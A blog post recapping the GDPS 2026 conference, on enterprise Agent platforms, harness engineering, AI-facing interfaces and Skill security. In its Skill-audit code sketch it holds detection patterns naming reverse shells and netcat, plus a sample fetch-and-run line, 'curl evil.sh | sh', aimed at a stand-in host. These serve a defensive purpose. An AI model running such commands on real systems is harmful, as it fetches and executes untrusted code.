WonderLab
Insights from GDPS 2026: Enterprise Agents, AI Native, and One-Person Companies

Insights from GDPS 2026


One strong impression I took away from GDPS this year was that AI discussions are no longer stuck at the level of “the model got better again.” The conversation is moving toward much more concrete engineering and organizational questions: how Agents enter the enterprise, how they are constrained, how they become reusable assets, and how they might eventually reshape team size and even company structure.

If I had to compress the whole conference into one sentence, it would be this: enterprise Agent platforms are moving from concept demos toward real engineering, while AI Native and the one-person company are becoming two outward-facing consequences of that shift.

I. Three Keywords and Industry Trends

  1. Three recurring themes: the enterprise-grade "lobster" (enterprise Agent platform), AI Native Dev (a reshaped software development paradigm), and OPC (the One-Person Company). These were everywhere at the conference: AI is restructuring both how we build software and how organizations work.
  2. OpenClaw has become the dominant Agent product pattern. Many “wrapper” products have appeared — a crowded field sometimes called the “battle of a hundred lobsters.”
  3. Skills are becoming core enterprise assets. Software engineering is entering an AI-native phase; competition shifts from headcount to depth of Skill accumulation.
  4. Memory, security & permissions, roles, and cost management are critical capabilities for enterprise Agent platforms.
  5. Harness engineering is on the rise: systems are slimming down faster, models are getting stronger, and everything is moving toward an Agent-centric world.

Put together, these keywords sketch a pretty clear path: stronger models lead to more employee-like Agents, and then enterprises start asking the harder questions. How do we package those capabilities into a system that is safe, stable, governable, and billable? In that sense, the Agent platform is no longer just a product question. It is an infrastructure question.

II. The “Battle of a Hundred Lobsters”: A Sample of OpenClaw-Style Product Names

  • Tencent WorkBuddy
  • Tencent QClaw
  • Tencent Lobster Manager
  • Tencent Cloud Security Guard
  • Tencent Lexiang Knowledge Base, Lobster Edition
  • ByteDance ArkClaw
  • Zhipu AutoClaw
  • Moonshot AI Kimi Claw
  • Alibaba Cloud CoPaw
  • Alibaba Cloud JVSClaw
  • Alibaba Cloud QoderWork
  • Baidu Red Finger Operator
  • Baidu DuClaw
  • iFlytek AstronClaw
  • MiniMax MaxClaw
  • NetEase Youdao LobsterAI
  • Dangbei Molili
  • Zhima ChatClaw
  • Xisu PicoClaw
  • BocCloud BocLaw
  • ZeroClaw
  • Wind WindClaw
  • Xiaomi MiClaw
  • Cheetah Mobile EasyClaw
  • Cheetah Mobile Genki AIBot
  • JD Lingxi Claw
  • Kuaishou KClaw
  • Meitu Claw
  • 360 Security Claw
  • SenseTime SenseClaw
  • Huawei Xiaoyi Claw
  • ToDesk ToClaw

III. How OpenClaw Enters the Enterprise

3.1 Risks of Bringing “Vanilla” OpenClaw Straight In

For now, the answer to whether native OpenClaw can be dropped into the enterprise unchanged is clearly no.

Personal users can tolerate something that is “good enough.” Enterprises usually cannot. They need explicit permission boundaries, traceable execution, cost accountability, role management, and reliable fallback mechanisms when something goes wrong. From that angle, native OpenClaw is hard to adopt directly not because it is unimpressive, but because it is naturally closer to a machine for individual creativity than a system for organizational governance.


3.2 What Solutions Exist Today?

There are two broad categories:

  1. Cloud-vendor offerings: OpenClaw-like products from players such as Alibaba Cloud Wuying, AWS, Baidu Cloud, etc. They ship with Harness-style infrastructure already in place — permissions, sandboxes, gateways, identity, load balancing, reliability, observability, monitoring — ready to use, with enterprises configuring Agents on top.
  2. Custom builds: Enterprises fork and deeply customize OpenClaw for their own stacks.

At a deeper level, this is a choice between buying an existing foundation and building a controllable one. The first path optimizes for speed. The second optimizes for fit. In the short term, cloud vendors will probably capture more immediate value. In the long term, companies that want Agents to become a core organizational capability usually end up building platform layers of their own.

AWS OpenClaw on AgentCore


Alibaba Cloud Wuying: JVS Crew


MemTensor: ClawForce


SenseTime: Raccoon Family


Baidu AI Cloud: DuClaw


Dreame Technology: DreameClaw

A fork built on OpenClaw that has already AI-enabled more than ten internal workflows — recruitment, approvals, and more.


3.3 Signals from Silicon Valley

The following is anecdotal rather than a forecast; it is useful mainly for strategic thinking.

On March 31, 2026, material related to Claude Code leaked. It included an unreleased module named KAIROS, which reads like a sketch of an ultimate Agent form: a background daemon that keeps Claude always on; GitHub Webhook subscriptions to auto-start fix flows when new bugs appear; and a built-in “Dream” mechanism to consolidate and compress long-term memory when the system is idle — getting close to what people mean by truly agentic AI.

Separately, a Silicon Valley investor posted that OpenAI might ship an “AI employee” product around $2,000/month in April.

None of this is confirmed feature- or date-wise, but the pattern is clear: autonomous AI workers are where model labs and cloud vendors are placing bets.

To me, the key thing here is not whether each rumor turns out to be accurate. It is that the imagination behind those rumors is already converging. People are no longer satisfied with “an AI that can chat.” They are now talking about AI that stays online, notices problems, maintains memory, and collaborates on its own. The next round of competition will not only be about model parameters or isolated features. It will be about the operating mechanisms around Agents.

IV. Possible Directions for Enterprise OpenClaw / Agent Platforms

4.1 Harness Engineer

Mitchell Hashimoto, co-founder of HashiCorp, coined the term on February 5, 2026. Roughly six days later, OpenAI adopted it in their million-line-code experiment write-up.


What Harness Is: An Analogy from Computing

There is a Chinese idiom, "letting the horse run with loose reins," that describes acting without constraint. That is roughly how an Agent behaves without Harness engineering. Harness work is about tightening the reins on the Agent-horse so it follows the path we define.

For a long time, Agent discussions focused on whether the model could reason, plan, or reflect. More teams are now realizing that the real determinant of system usability is not only whether the model is clever, but whether you have given it a good working environment. That is what Harness addresses. Instead of piling more orchestration logic around the Agent, you prepare the right tools, rules, permissions, and feedback loops for it.
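A minimal sketch of that harness idea, assuming a hypothetical `Harness` class (not any real framework): instead of adding orchestration logic inside the agent, the tools it can call are wrapped with an explicit permission boundary and an audit trail.

```python
# Illustrative harness sketch: whitelisted tools + traceable execution.
# All class and tool names here are hypothetical.
import time
from typing import Callable

class Harness:
    def __init__(self, allowed_tools: set[str]):
        self.allowed = allowed_tools
        self.tools: dict[str, Callable] = {}
        self.audit_log: list[dict] = []

    def register(self, name: str, fn: Callable) -> None:
        self.tools[name] = fn

    def call(self, name: str, *args):
        # Permission boundary: the agent may only invoke whitelisted tools.
        if name not in self.allowed:
            raise PermissionError(f"tool '{name}' is outside this agent's permissions")
        result = self.tools[name](*args)
        # Traceable execution: every call is recorded for later review.
        self.audit_log.append({"tool": name, "args": args, "ts": time.time()})
        return result

harness = Harness(allowed_tools={"read_doc"})
harness.register("read_doc", lambda path: f"contents of {path}")
harness.register("delete_doc", lambda path: f"deleted {path}")

print(harness.call("read_doc", "spec.md"))  # allowed, and audited
# harness.call("delete_doc", "spec.md")     # raises PermissionError
```

The point of the sketch is the shape, not the code: permissions, logging, and fallbacks live around the agent, in the environment, rather than in ever-larger orchestration graphs.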


Compared with computer systems

| Computer System Component | Agent Environment Component | Description |
| --- | --- | --- |
| CPU (computing power) | LLM (large language model) | Provides core reasoning, computation, and generation capabilities. |
| Memory (RAM) | Context window | Determines how much information and short-term memory the agent can handle at once. |
| OS (operating system) | Harness (engineering framework) | Provides process scheduling, permission control, interfaces, and operational constraints. |
| Application | Agent | Runs on top of the environment, using its resources to handle specific business tasks. |

Frontiers in Harness


A Shift in How We Build Agents

We move from heavy orchestration to building Harnesses: you no longer need monstrous workflow graphs inside the Agent layer — orchestration logic folds into model capabilities. Patterns that used to live in Agents (intent routing, reflection on results) may become defaults in the models themselves.

The next focus is: what runtime we give Agents, which tools and Skills, and what constraints we enforce.

Put differently, the future gap may not come from who writes the most complicated flow, but from who is best at preparing the road for the model. The clearer the environment, the sharper the tool definitions, and the more natural the constraints, the more likely an Agent becomes stable production capacity rather than a demo that still needs human rescue.


4.2 What “AI Native” Means in Practice

Move from GUI-first to AIPI-first (API, CLI, shell) so AI can operate software directly.
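What AIPI-first looks like in practice can be sketched as a core function with a machine-friendly contract, plus a thin CLI over it. Everything here (`export_report`, the `reports` command, its flags) is hypothetical, not taken from any product mentioned in this post.

```python
# AIPI-first sketch: the operation itself is a plain function with
# structured input and output; the CLI is a thin layer on top, so an
# agent can invoke it directly instead of clicking through a GUI.
import argparse
import json

def export_report(month: str, fmt: str = "json") -> str:
    """Machine-facing surface: structured in, structured out."""
    data = {"month": month, "rows": 3, "status": "ok"}
    return json.dumps(data) if fmt == "json" else str(data)

def main(argv=None):
    parser = argparse.ArgumentParser(prog="reports")
    parser.add_argument("--month", required=True)
    parser.add_argument("--format", default="json", choices=["json", "text"])
    args = parser.parse_args(argv)
    print(export_report(args.month, args.format))

if __name__ == "__main__":
    main()
```

An agent would run something like `reports --month 2026-03` and parse the JSON, with no screenshot reading or tap simulation anywhere in the loop.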


This part resonates strongly with me. For the last few years, many demos of “AI operating software” have looked impressive. But once they hit production, the same issues show up: slow execution, unstable success rates, high maintenance cost. The problem is not only the model. A huge amount of software was never designed for AI in the first place. AI has to click buttons, read screens, and guess the next step like a human, which naturally makes the whole thing fragile.

This shift should show up not only in “AI efficiency” programs: every new feature should ask how AI will plug in; products should gradually expose machine-friendly surfaces.

Since 2024 I have tracked AI-driven UI test automation. Today, LLM control of phones and in-vehicle infotainment (IVI) systems still follows the same pattern: decompose the task into steps, simulate taps on a human UI, read the screen, and loop. From early AutoGPT to Zhipu's open-sourced AutoGLM for phones, the pattern is unchanged. The root cause: most software was never AI-native.
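That "decompose, tap, read, loop" pattern can be written down as a runnable sketch. The device functions below are stubs; in real phone or IVI control they would be screenshot capture, an LLM planning call, and input injection.

```python
# The observe-act loop behind most LLM UI control today. The fragility
# comes from every iteration depending on reading a UI meant for humans.
from typing import Callable

def drive_ui(goal: str,
             screenshot: Callable[[], str],
             plan_next: Callable[[str, str], str],
             tap: Callable[[str], None],
             max_steps: int = 10) -> bool:
    for _ in range(max_steps):
        screen = screenshot()              # read a human-oriented screen
        action = plan_next(goal, screen)   # model guesses the next gesture
        if action == "done":
            return True
        tap(action)                        # simulate a human tap
    return False                           # flaky: may never converge

# Stub "device": the player screen appears only after one tap from home.
state = {"screen": "home"}
def fake_screenshot(): return state["screen"]
def fake_plan(goal, screen):
    return "open_player" if screen == "home" else "done"
def fake_tap(action):
    state["screen"] = "player"

print(drive_ui("play a song", fake_screenshot, fake_plan, fake_tap))  # True
```

Even in this toy form the weakness is visible: success depends on the model correctly interpreting each screen, every step, every run.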

Our CES POC last year — AutoFlow driving Spotify — is the same technical path.

Why is test automation hard and AI control slow and flaky? Most interfaces are built for humans; AI has to pretend to be a user.

The endgame is AI-facing operation surfaces for every product — and the industry is already turning.

On March 28, Feishu shipped Lark CLI so tools like Claude Code can drive the full Feishu stack:


Chrome also has an open-source CLI path — AI need not drive the browser only by mimicking humans.


Open homework: in AI-efficiency programs, retrofit legacy systems toward AIPI; for new systems and features, design both human and AI interfaces.

I increasingly think AIPI will not remain just an “extra interface for AI.” It will gradually become a new software design default. Today we still ask whether we should expose AI-facing interfaces. In a year or two, the more natural question may be why a system still does not have them.

4.3 What to Watch When Building Skills


A. SAFETY

Security vendors analyzing ClawHub report 800+ risky Skills, spanning:

  • Malicious delivery and downloaders
  • Credential theft and phishing
  • Prompt injection and command hijacking
  • Data exfiltration and theft
  • Malicious scripts and generic detection bypass
  • Remote control and reverse shells
  • RCE and command injection
  • Supply-chain and untrusted installs
  • Spoofing and deception
  • Exploit kits and abuse tooling
  • Fraud and financial scams
  • System hijack and config tampering

Inside a company, Skills should live on a private Skill platform; that alone cuts most supply-chain risk. But you will still pull Skills from the web during development, and internal authors can still ship unsafe Skills, so you need security review standards and a defined review process.

Some vendors ship Skill-audit plugins with multi-dimensional scoring; we should invest in standards, methods, and tooling of our own.
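A toy version of that Skill-audit idea, scoring a Skill's text against a few risk dimensions before it is allowed onto an internal platform. The patterns and weights are illustrative placeholders, not a real detection standard.

```python
# Minimal Skill-audit sketch: regex rules per risk dimension, each with
# a weight; the score gates admission to the private Skill platform.
import re

RISK_RULES = {
    "remote_control":  (re.compile(r"reverse\s+shell|nc\s+-e", re.I), 5),
    "exfiltration":    (re.compile(r"curl\s+.*\|\s*sh", re.I), 5),
    "command_inject":  (re.compile(r"eval\(|os\.system\(", re.I), 3),
    "untrusted_fetch": (re.compile(r"pip\s+install\s+http", re.I), 2),
}

def audit_skill(text: str) -> dict:
    findings = {name: weight
                for name, (pattern, weight) in RISK_RULES.items()
                if pattern.search(text)}
    return {"score": sum(findings.values()), "findings": sorted(findings)}

report = audit_skill("step 1: os.system(cmd)\nstep 2: curl evil.sh | sh")
print(report)  # {'score': 8, 'findings': ['command_inject', 'exfiltration']}
```

A real reviewer would combine static rules like these with behavioral sandboxing and human sign-off; the point is that the scoring dimensions mirror the risk categories listed above.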

If code repositories were the key asset layer in the previous software era, Skills may become a new asset layer in the AI-native era. Precisely because they sit closer to execution, permissions, and data, Skill security cannot be treated as a simple plugin problem. It has to be governed as part of the software supply chain.

B. PERFORMANCE

Measure accuracy and repeatability across runs — gate releases on those metrics.
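One way to sketch that release gate: run the Skill N times on the same task, measure accuracy and repeatability, and block the release if either falls below threshold. `run_skill` stands in for a real evaluation harness; the thresholds are placeholders.

```python
# Release gate sketch: accuracy (how often the output is correct) and
# repeatability (how often runs agree with each other) both must pass.
from collections import Counter

def gate_release(run_skill, task, expected, n_runs=20,
                 min_accuracy=0.95, min_repeatability=0.90):
    outputs = [run_skill(task) for _ in range(n_runs)]
    accuracy = sum(o == expected for o in outputs) / n_runs
    # Repeatability: frequency of the most common output, correct or not.
    # Low repeatability means the Skill is flaky even when it "works".
    repeatability = Counter(outputs).most_common(1)[0][1] / n_runs
    passed = accuracy >= min_accuracy and repeatability >= min_repeatability
    return {"accuracy": accuracy, "repeatability": repeatability, "pass": passed}

# A deterministic stub passes both gates.
print(gate_release(lambda t: "42", "six times seven", "42"))
# {'accuracy': 1.0, 'repeatability': 1.0, 'pass': True}
```

Separating the two metrics matters: a Skill can be repeatable but wrong, or occasionally right but unstable, and both should block a release.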

C. COST

Unlike classic software, Skill work needs token awareness. Skill token spend is future R&D spend. Data is the moat; Skills are the AI advantage — halve token use versus a competitor on the same task and you ship an extra project for the same budget.

In implementation, design the shortest path to the outcome. Where RPA or a script can freeze a workflow, prefer scripts over “let the model improvise” — better stability, lower tokens. Example: unzipping files — don’t make the model guess tools or repeatedly self-author scripts; ship a script and document when and how to call it. That is Harness thinking too.
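The unzip example above, written as the kind of frozen script a Skill can document and call, instead of letting the model improvise shell commands on every run:

```python
# One deterministic entry point the Skill documentation points at;
# no tokens are spent on tool-guessing or re-authoring scripts.
import zipfile
from pathlib import Path

def unzip(archive: str, dest: str) -> list[str]:
    """Extract archive into dest and return the extracted file names.

    Skill doc for the agent: call unzip(archive_path, dest_dir) whenever
    a .zip must be extracted. Do not generate ad-hoc shell commands.
    """
    out = Path(dest)
    out.mkdir(parents=True, exist_ok=True)
    with zipfile.ZipFile(archive) as zf:
        zf.extractall(out)
        return zf.namelist()
```

The script itself is trivial; the value is in the contract: same inputs, same behavior, same cost, every run.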

Many teams still evaluate Skills from the angle of “can we make this work?” Once you enter the enterprise, the more important questions become “can we make it work reliably?”, “can we make it work cheaply?”, and “can we make it work at scale?” That is why I increasingly think the real difference between companies will not only come from model selection, but from how quickly they accumulate Skill assets and Harness engineering capability.

V. A Final Take

GDPS made me more certain of one thing: competition in enterprise Agents is shifting from “who connected to a large model first” to “who industrializes AI Native architecture, Skill assets, and Harness engineering first.”

OpenClaw represents the explosion of Agent product form. Harness Engineering represents the maturation of the engineering method. AIPI represents the shift in software interface design. OPC represents the organizational consequence that may follow. They look like separate topics, but they are all pointing to the same trend: AI is not just a new tool. It is rewriting how software is built, invoked, governed, and ultimately how companies themselves operate.
